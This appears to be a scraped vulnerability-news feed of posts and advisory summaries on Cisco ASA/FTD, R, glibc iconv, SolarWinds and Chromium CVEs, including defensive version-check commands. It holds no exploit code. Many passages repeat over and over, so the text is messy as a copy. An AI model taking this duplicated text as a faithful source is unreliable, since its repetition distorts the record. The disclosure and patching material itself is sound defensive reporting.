CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.
Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.
Cisco has released free software updates that address the vulnerability described in this advisory.
#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity
##Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities
Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory
Issue Summary
The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.
Technical Key Findings
CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.
Vulnerable Products
Impact Assessment
Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.
Patches or Workaround
Cisco has released free software updates that address the vulnerability described in this advisory.
Tags
#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity
##Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory
The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.
CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.
Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.
Cisco has released free software updates that address the vulnerability described in this advisory.
#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity
##Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities
Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory
Issue Summary
The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.
Technical Key Findings
CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.
Vulnerable Products
Impact Assessment
Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.
Patches or Workaround
Cisco has released free software updates that address the vulnerability described in this advisory.
Tags
#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity
##Multiple government agencies has published an advisory on an ongoing APT campaign targeting Cisco ASA / FTD devices using post-auth RCE bug CVE-2024-20359 and CVE-2024-20358.
They don't know how the attackers initially got in.
Important note from the research published by Cisco Talos calling the APT operation* "ArcaneDoor":
> We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date. Our investigation is ongoing, and we will provide updates, if necessary, in the security advisories or on this blog.
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
##While Cisco's Event Response lists CVE-2024-20358 as "leveraged in these attacks," its own security advisory states:
The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.
🔗 CVE-2024-20358 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Command Injection Vulnerability
CISA's RSS feed showed that the security alert for the KEV additions created at 0800 ET, meaning it was coordinated and prepared in advance of Cisco's announcements. Because CISA only added the other two Cisco vulnerabilities, CVE-2024-20358 does not appear to be a known exploited vulnerability.
##Multiple government agencies has published an advisory on an ongoing APT campaign targeting Cisco ASA / FTD devices using post-auth RCE bug CVE-2024-20359 and CVE-2024-20358.
They don't know how the attackers initially got in.
Important note from the research published by Cisco Talos calling the APT operation* "ArcaneDoor":
> We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date. Our investigation is ongoing, and we will provide updates, if necessary, in the security advisories or on this blog.
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
##While Cisco's Event Response lists CVE-2024-20358 as "leveraged in these attacks," its own security advisory states:
The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.
🔗 CVE-2024-20358 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Command Injection Vulnerability
CISA's RSS feed showed that the security alert for the KEV additions created at 0800 ET, meaning it was coordinated and prepared in advance of Cisco's announcements. Because CISA only added the other two Cisco vulnerabilities, CVE-2024-20358 does not appear to be a known exploited vulnerability.
##updated 2024-04-29T21:30:34
8 posts
Vulnerability in R Programming Language Could Fuel Supply Chain Attacks https://www.securityweek.com/vulnerability-in-r-programming-language-enables-supply-chain-attacks/ #Vulnerabilities #vulnerability #CVE202427322 #Featured
##Vulnerability in R Programming Language Could Fuel Supply Chain Attacks https://www.securityweek.com/vulnerability-in-r-programming-language-enables-supply-chain-attacks/ #Vulnerabilities #vulnerability #CVE202427322 #Featured
##CVE-2024-27322, if you missed this:. #cybersecurity #infosec
Vulnerability in R Programming Language Enables Supply Chain Attacks https://www.securityweek.com/vulnerability-in-r-programming-language-enables-supply-chain-attacks/ @SecurityWeek
##The CVE-2024-27322 security vulnerability in R's deserialization process gives attackers a way to execute arbitrary code in target environments via specially crafted files. https://www.darkreading.com/application-security/r-programming-language-exposes-orgs-to-supply-chain-risk
##🚨Looks like #RStats was not immune to deserialization bugs after all https://hiddenlayer.com/research/r-bitrary-code-execution/
Watch those R Data files (and, we now shld come up with better ways to ensure local R library integrity)!!
CVE-2024-27322
##CVE-2024-27322, if you missed this:. #cybersecurity #infosec
Vulnerability in R Programming Language Enables Supply Chain Attacks https://www.securityweek.com/vulnerability-in-r-programming-language-enables-supply-chain-attacks/ @SecurityWeek
##The CVE-2024-27322 security vulnerability in R's deserialization process gives attackers a way to execute arbitrary code in target environments via specially crafted files. https://www.darkreading.com/application-security/r-programming-language-exposes-orgs-to-supply-chain-risk
##🚨Looks like #RStats was not immune to deserialization bugs after all https://hiddenlayer.com/research/r-bitrary-code-execution/
Watch those R Data files (and, we now shld come up with better ways to ensure local R library integrity)!!
CVE-2024-27322
##updated 2024-04-29T09:31:52
1 posts
1 repos
Hackers Exploit WP-Automatic Plugin Vulnerability, Threatening WordPress Site Security https://thecyberexpress.com/wp-automatic-plugin-vulnerability/ #WPAutomaticpluginvulnerabilities #WPAutomaticPluginVulnerability #criticalvulnerability #TheCyberExpressNews #WPAutomaticplugin #Vulnerabilities #TheCyberExpress #FirewallDaily #CVE202427956
##updated 2024-04-29T05:02:34
2 posts
SolarWinds security advisory: SolarWinds Platform Arbitrary Open Redirection Vulnerability (CVE-2024-28076)
CVE-2024-28076 (7.0 high, disclosed 18 April 2024) arbitrary open redirection vulnerability. If exploited, a potential attacker can redirect to a different domain when using URL parameter with relative entry in the correct format.
Interestingly, SolarWinds wrote the vector as CVSS:7.0/AV:A/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:L
I didn't know we were up to CVSSv7!!
SolarWinds security advisory: SolarWinds Platform Arbitrary Open Redirection Vulnerability (CVE-2024-28076)
CVE-2024-28076 (7.0 high, disclosed 18 April 2024) arbitrary open redirection vulnerability. If exploited, a potential attacker can redirect to a different domain when using URL parameter with relative entry in the correct format.
Interestingly, SolarWinds wrote the vector as CVSS:7.0/AV:A/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:L
I didn't know we were up to CVSSv7!!
updated 2024-04-29T05:02:33
28 posts
1 repos
Date: April 17, 2024
CVE: CVE-2024-2961
Vulnerability Type: Out-of-bounds Write
CWE: [[CWE-787]]
Sources: SecurityVulnerability.io, NVD Mitigation blog
A critical buffer overflow vulnerability has been identified in the GNU C Library's iconv function when converting charsets to certain Chinese Extended encodings. This flaw occurs when converting strings to the ISO-2022-CN-EXT character set in versions prior to 2.40, potentially leading to application crashes or memory corruption.
The vulnerability stems from improper boundary checks during character set conversion, allowing up to 4 bytes of overflow. This could enable attackers to execute arbitrary code or disrupt program operation by manipulating memory locations adjacent to the buffer.
All versions of GNU C Library older than 2.40 are susceptible. (That's potentially 24 years of a buffer overflow presence in the glibc!)
The vulnerability poses a high risk, potentially affecting the confidentiality, integrity, and availability of systems utilizing the affected library versions. There is no evidence of active exploitation yet, but the severity of potential impacts warrants prompt attention.
The GNU C Library has released patches for this vulnerability. Users are advised to update to version 2.40 or later. If you are unable to (or it's not available on your OS yet), you can mitigate this issue by disabling the affected charsets in gconv.
// The first line of the linker version info should include the version of glibc (either as GLIBC or GNU libc).
ldd --version
// Check if the vulnerable encodings are enabled in iconv:
iconv -l | grep -E 'CN-?EXT'
If they are, you will see an output like:
ISO-2022-CN-EXT//
ISO2022CNEXT//
#GNUCLibrary #CVE-2024-2961 #BufferOverflow #SecurityPatch #ISO2022CNEXT #CVE20242961 #iconv #iconvglibc
##I wonder if GLIBC-SA-2024-0004 / CVE-2024-2961 "iconv() out-of-bound writes when writing escape sequence" might allow exploitation in some setuid binaries. Being limited to fixed values '$+I', '$+J', '$+K', '$+L', '$+M', or '$*H' for the overwrite does place fairly significant limitations, however. I believe it would have to be very specific scenario to be exploitable (maybe affecting code flow by setting some variable to nonzero)
https://sourceware.org/git/?p=glibc.git;a=blob;f=advisories/GLIBC-SA-2024-0004 #GLIBCSA20240004 #CVE20242961 #vulnerability #infosec #cybersecurity
Buffer Overflow in GNU C Library Affects Older Versions
Date: April 17, 2024
CVE: CVE-2024-2961
Vulnerability Type: Out-of-bounds Write
CWE: [[CWE-787]]
Sources: SecurityVulnerability.io, NVD Mitigation blog
Issue Summary
A critical buffer overflow vulnerability has been identified in the GNU C Library's iconv function when converting charsets to certain Chinese Extended encodings. This flaw occurs when converting strings to the ISO-2022-CN-EXT character set in versions prior to 2.40, potentially leading to application crashes or memory corruption.
Technical Key Findings
The vulnerability stems from improper boundary checks during character set conversion, allowing up to 4 bytes of overflow. This could enable attackers to execute arbitrary code or disrupt program operation by manipulating memory locations adjacent to the buffer.
Vulnerable Products
All versions of GNU C Library older than 2.40 are susceptible. (That's potentially 24 years of a buffer overflow presence in the glibc!)
Impact Assessment
The vulnerability poses a high risk, potentially affecting the confidentiality, integrity, and availability of systems utilizing the affected library versions. There is no evidence of active exploitation yet, but the severity of potential impacts warrants prompt attention.
Patches or Workaround
The GNU C Library has released patches for this vulnerability. Users are advised to update to version 2.40 or later. If you are unable to (or it's not available on your OS yet), you can mitigate this issue by disabling the affected charsets in gconv.
Check if you are vulnerable
// The first line of the linker version info should include the version of glibc (either as GLIBC or GNU libc).
ldd --version
// Check if the vulnerable encodings are enabled in iconv:
iconv -l | grep -E 'CN-?EXT'
If they are, you will see an output like:
ISO-2022-CN-EXT//
ISO2022CNEXT//
Tags
#GNUCLibrary #CVE-2024-2961 #BufferOverflow #SecurityPatch #ISO2022CNEXT #CVE20242961 #iconv #iconvglibc
##I wonder if GLIBC-SA-2024-0004 / CVE-2024-2961 "iconv() out-of-bound writes when writing escape sequence" might allow exploitation in some setuid binaries. Being limited to fixed values '$+I', '$+J', '$+K', '$+L', '$+M', or '$*H' for the overwrite does place fairly significant limitations, however. I believe it would have to be very specific scenario to be exploitable (maybe affecting code flow by setting some variable to nonzero)
https://sourceware.org/git/?p=glibc.git;a=blob;f=advisories/GLIBC-SA-2024-0004 #GLIBCSA20240004 #CVE20242961 #vulnerability #infosec #cybersecurity
Oh just PHP apps? NBD #CVE_2024_2961 #ThreatIntel
securityonline.info/cve-2024-2961-glibc-vulnerability-opens-door-to-php-attacks-patch-immediately/
The vulnerability, cataloged under CVE-2024-2961 and rated 8.8 on the CVSS scale, resides in the ISO-2022-CN-EXT plugin of the glibc’s iconv library. This critical flaw occurs during the charset conversion process from UCS4, where specific escape characters are required to signify changes in the charset to the library. However, due to insufficient boundary checks on internal buffers, an out-of-bounds write can occur, allowing up to three bytes to be written outside the intended memory area.##
This vulnerability poses a significant risk as it compromises the Integrity, Confidentiality, and Availability (ICA) triad by potentially allowing attackers to craft malicious character sequences that trigger the out-of-bounds write, leading to remote code execution. The exploitation of this flaw could result in application crashes, arbitrary memory corruption, data overwrites, and even system takeovers.
Oh just PHP apps? NBD #CVE_2024_2961 #ThreatIntel
securityonline.info/cve-2024-2961-glibc-vulnerability-opens-door-to-php-attacks-patch-immediately/
The vulnerability, cataloged under CVE-2024-2961 and rated 8.8 on the CVSS scale, resides in the ISO-2022-CN-EXT plugin of the glibc’s iconv library. This critical flaw occurs during the charset conversion process from UCS4, where specific escape characters are required to signify changes in the charset to the library. However, due to insufficient boundary checks on internal buffers, an out-of-bounds write can occur, allowing up to three bytes to be written outside the intended memory area.##
This vulnerability poses a significant risk as it compromises the Integrity, Confidentiality, and Availability (ICA) triad by potentially allowing attackers to craft malicious character sequences that trigger the out-of-bounds write, leading to remote code execution. The exploitation of this flaw could result in application crashes, arbitrary memory corruption, data overwrites, and even system takeovers.
Date: April 17, 2024
CVE: CVE-2024-2961
Vulnerability Type: Out-of-bounds Write
CWE: [[CWE-787]]
Sources: SecurityVulnerability.io, NVD Mitigation blog
A critical buffer overflow vulnerability has been identified in the GNU C Library's iconv function when converting charsets to certain Chinese Extended encodings. This flaw occurs when converting strings to the ISO-2022-CN-EXT character set in versions prior to 2.40, potentially leading to application crashes or memory corruption.
The vulnerability stems from improper boundary checks during character set conversion, allowing up to 4 bytes of overflow. This could enable attackers to execute arbitrary code or disrupt program operation by manipulating memory locations adjacent to the buffer.
All versions of GNU C Library older than 2.40 are susceptible. (That's potentially 24 years of a buffer overflow presence in the glibc!)
The vulnerability poses a high risk, potentially affecting the confidentiality, integrity, and availability of systems utilizing the affected library versions. There is no evidence of active exploitation yet, but the severity of potential impacts warrants prompt attention.
The GNU C Library has released patches for this vulnerability. Users are advised to update to version 2.40 or later. If you are unable to (or it's not available on your OS yet), you can mitigate this issue by disabling the affected charsets in gconv.
// The first line of the linker version info should include the version of glibc (either as GLIBC or GNU libc).
ldd --version
// Check if the vulnerable encodings are enabled in iconv:
iconv -l | grep -E 'CN-?EXT'
If they are, you will see an output like:
ISO-2022-CN-EXT//
ISO2022CNEXT//
#GNUCLibrary #CVE-2024-2961 #BufferOverflow #SecurityPatch #ISO2022CNEXT #CVE20242961 #iconv #iconvglibc
##I wonder if GLIBC-SA-2024-0004 / CVE-2024-2961 "iconv() out-of-bound writes when writing escape sequence" might allow exploitation in some setuid binaries. Being limited to fixed values '$+I', '$+J', '$+K', '$+L', '$+M', or '$*H' for the overwrite does place fairly significant limitations, however. I believe it would have to be very specific scenario to be exploitable (maybe affecting code flow by setting some variable to nonzero)
https://sourceware.org/git/?p=glibc.git;a=blob;f=advisories/GLIBC-SA-2024-0004 #GLIBCSA20240004 #CVE20242961 #vulnerability #infosec #cybersecurity
Buffer Overflow in GNU C Library Affects Older Versions
Date: April 17, 2024
CVE: CVE-2024-2961
Vulnerability Type: Out-of-bounds Write
CWE: [[CWE-787]]
Sources: SecurityVulnerability.io, NVD Mitigation blog
Issue Summary
A critical buffer overflow vulnerability has been identified in the GNU C Library's iconv function when converting charsets to certain Chinese Extended encodings. This flaw occurs when converting strings to the ISO-2022-CN-EXT character set in versions prior to 2.40, potentially leading to application crashes or memory corruption.
Technical Key Findings
The vulnerability stems from improper boundary checks during character set conversion, allowing up to 4 bytes of overflow. This could enable attackers to execute arbitrary code or disrupt program operation by manipulating memory locations adjacent to the buffer.
Vulnerable Products
All versions of GNU C Library older than 2.40 are susceptible. (That's potentially 24 years of a buffer overflow presence in the glibc!)
Impact Assessment
The vulnerability poses a high risk, potentially affecting the confidentiality, integrity, and availability of systems utilizing the affected library versions. There is no evidence of active exploitation yet, but the severity of potential impacts warrants prompt attention.
Patches or Workaround
The GNU C Library has released patches for this vulnerability. Users are advised to update to version 2.40 or later. If you are unable to (or it's not available on your OS yet), you can mitigate this issue by disabling the affected charsets in gconv.
Check if you are vulnerable
// The first line of the linker version info should include the version of glibc (either as GLIBC or GNU libc).
ldd --version
// Check if the vulnerable encodings are enabled in iconv:
iconv -l | grep -E 'CN-?EXT'
If they are, you will see an output like:
ISO-2022-CN-EXT//
ISO2022CNEXT//
Tags
#GNUCLibrary #CVE-2024-2961 #BufferOverflow #SecurityPatch #ISO2022CNEXT #CVE20242961 #iconv #iconvglibc
##I wonder if GLIBC-SA-2024-0004 / CVE-2024-2961 "iconv() out-of-bound writes when writing escape sequence" might allow exploitation in some setuid binaries. Being limited to fixed values '$+I', '$+J', '$+K', '$+L', '$+M', or '$*H' for the overwrite does place fairly significant limitations, however. I believe it would have to be very specific scenario to be exploitable (maybe affecting code flow by setting some variable to nonzero)
https://sourceware.org/git/?p=glibc.git;a=blob;f=advisories/GLIBC-SA-2024-0004 #GLIBCSA20240004 #CVE20242961 #vulnerability #infosec #cybersecurity
Oh just PHP apps? NBD #CVE_2024_2961 #ThreatIntel
securityonline.info/cve-2024-2961-glibc-vulnerability-opens-door-to-php-attacks-patch-immediately/
The vulnerability, cataloged under CVE-2024-2961 and rated 8.8 on the CVSS scale, resides in the ISO-2022-CN-EXT plugin of the glibc’s iconv library. This critical flaw occurs during the charset conversion process from UCS4, where specific escape characters are required to signify changes in the charset to the library. However, due to insufficient boundary checks on internal buffers, an out-of-bounds write can occur, allowing up to three bytes to be written outside the intended memory area.##
This vulnerability poses a significant risk as it compromises the Integrity, Confidentiality, and Availability (ICA) triad by potentially allowing attackers to craft malicious character sequences that trigger the out-of-bounds write, leading to remote code execution. The exploitation of this flaw could result in application crashes, arbitrary memory corruption, data overwrites, and even system takeovers.
Oh just PHP apps? NBD #CVE_2024_2961 #ThreatIntel
securityonline.info/cve-2024-2961-glibc-vulnerability-opens-door-to-php-attacks-patch-immediately/
The vulnerability, cataloged under CVE-2024-2961 and rated 8.8 on the CVSS scale, resides in the ISO-2022-CN-EXT plugin of the glibc’s iconv library. This critical flaw occurs during the charset conversion process from UCS4, where specific escape characters are required to signify changes in the charset to the library. However, due to insufficient boundary checks on internal buffers, an out-of-bounds write can occur, allowing up to three bytes to be written outside the intended memory area.##
This vulnerability poses a significant risk as it compromises the Integrity, Confidentiality, and Availability (ICA) triad by potentially allowing attackers to craft malicious character sequences that trigger the out-of-bounds write, leading to remote code execution. The exploitation of this flaw could result in application crashes, arbitrary memory corruption, data overwrites, and even system takeovers.
CVE-2024-2961 - glibc Vulnerability Opens Door to PHP Attacks: Patch Immediately https://securityonline.info/cve-2024-2961-glibc-vulnerability-opens-door-to-php-attacks-patch-immediately/
##glibc iconv buffer overflow vulnerability that can be used for remote code execution on servers running PHP. Present for 24 years. This is the kind of stuff Rust was made for.
- https://www.openwall.com/lists/oss-security/2024/04/18/4
- https://nvd.nist.gov/vuln/detail/CVE-2024-2961
- https://rockylinux.org/news/glibc-vulnerability-april-2024/
A vulnerability (CVE-2024-2961) that may affect PHP applications is receiving patches on many operating systems. It's advised to update & restart your systems where patches are available.
Ubuntu/Debian/Fedora appear to have patches available for supported systems. Rocky has some checking/workaround guidance here:
##There is a new PHP vulnerability out. It is being tracked as CVE-2024-2961. Here’s a video explaining the vulnerability https://youtu.be/u8jLUjpCWrs?si=Fm1JSBdAW9VBzuhj #cve #vulnerability #hacking #php #linux #news #Security
##tl;dr: upgrade glibc on your servers!
Summing it up, there's a vulnerability (CVE-2024-2961) on glibc that, apparently, can be used to get RCE on servers running PHP.
It's recommended that you update glibc to a patched version.
https://security-tracker.debian.org/tracker/CVE-2024-2961
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2024-2961
There's an upcoming talk on May 10 where the researcher will explain how it was used to hack PHP servers.
##@ramsey it's this one CVE-2024-2961 https://security-tracker.debian.org/tracker/CVE-2024-2961
##"No way to prevent this" say users of only language where this regularly happens
https://xeiaso.net/shitposts/no-way-to-prevent-this/CVE-2024-2961/
##CVE-2024-2961 - glibc Vulnerability Opens Door to PHP Attacks: Patch Immediately https://securityonline.info/cve-2024-2961-glibc-vulnerability-opens-door-to-php-attacks-patch-immediately/
##glibc iconv buffer overflow vulnerability that can be used for remote code execution on servers running PHP. Present for 24 years. This is the kind of stuff Rust was made for.
- https://www.openwall.com/lists/oss-security/2024/04/18/4
- https://nvd.nist.gov/vuln/detail/CVE-2024-2961
- https://rockylinux.org/news/glibc-vulnerability-april-2024/
A vulnerability (CVE-2024-2961) that may affect PHP applications is receiving patches on many operating systems. It's advised to update & restart your systems where patches are available.
Ubuntu/Debian/Fedora appear to have patches available for supported systems. Rocky has some checking/workaround guidance here:
##There is a new PHP vulnerability out. It is being tracked as CVE-2024-2961. Here’s a video explaining the vulnerability https://youtu.be/u8jLUjpCWrs?si=Fm1JSBdAW9VBzuhj #cve #vulnerability #hacking #php #linux #news #Security
##tl;dr: upgrade glibc on your servers!
Summing it up, there's a vulnerability (CVE-2024-2961) on glibc that, apparently, can be used to get RCE on servers running PHP.
It's recommended that you update glibc to a patched version.
https://security-tracker.debian.org/tracker/CVE-2024-2961
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2024-2961
There's an upcoming talk on May 10 where the researcher will explain how it was used to hack PHP servers.
##@ramsey it's this one CVE-2024-2961 https://security-tracker.debian.org/tracker/CVE-2024-2961
##"No way to prevent this" say users of only language where this regularly happens
https://xeiaso.net/shitposts/no-way-to-prevent-this/CVE-2024-2961/
##updated 2024-04-28T06:31:27
2 posts
Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
updated 2024-04-28T06:31:27
2 posts
Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
updated 2024-04-28T06:31:27
2 posts
Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
updated 2024-04-28T06:31:27
2 posts
Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
updated 2024-04-28T06:31:27
2 posts
Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
updated 2024-04-28T06:31:26
2 posts
Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
updated 2024-04-28T06:31:26
2 posts
Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
updated 2024-04-28T06:31:26
2 posts
Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
updated 2024-04-28T06:31:26
2 posts
Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
updated 2024-04-28T06:31:26
2 posts
